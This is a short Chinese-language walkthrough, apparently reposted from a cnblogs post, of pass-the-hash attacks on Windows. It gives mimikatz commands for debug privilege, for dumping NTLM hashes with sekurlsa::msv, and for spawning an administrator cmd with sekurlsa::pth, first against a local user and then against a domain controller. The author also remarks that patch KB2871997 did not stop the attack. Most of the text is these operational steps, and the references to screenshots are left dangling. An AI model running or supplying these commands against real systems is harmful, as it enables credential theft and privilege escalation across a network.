本地用户利用PTH攻击的条件
默认设置为0。如果设置为1,则SID为500的管理员也不能通过网络登录的方式获取高权限。
开打mimikatz输入
log 后续输出打印日志
privilege::debug 提升权限
sekurlsa::msv 抓取hash
让后pth 攻击
sekurlsa::pth /domian:要攻击的ip /user: 相同的用户名 /ntlm: NTLM哈希
弹出一个cmd 窗口 直接输入
可以看到c盘
在看看执行计划
能看到这个可以证明你拥有最高权限了
这是以本地用户进行的pth攻击
依旧如此只是在 domian 换成域控名字
sekurlsa::pth /domain:域控名 /user: 相同的用户名 /ntlm: NTLM哈希
获得了最高权限
疑惑的是我的域控已经打了补丁(KB2871997)
然而依旧获取了最高权限
这是补丁的原理
原文:https://www.cnblogs.com/feizianquan/p/11764344.html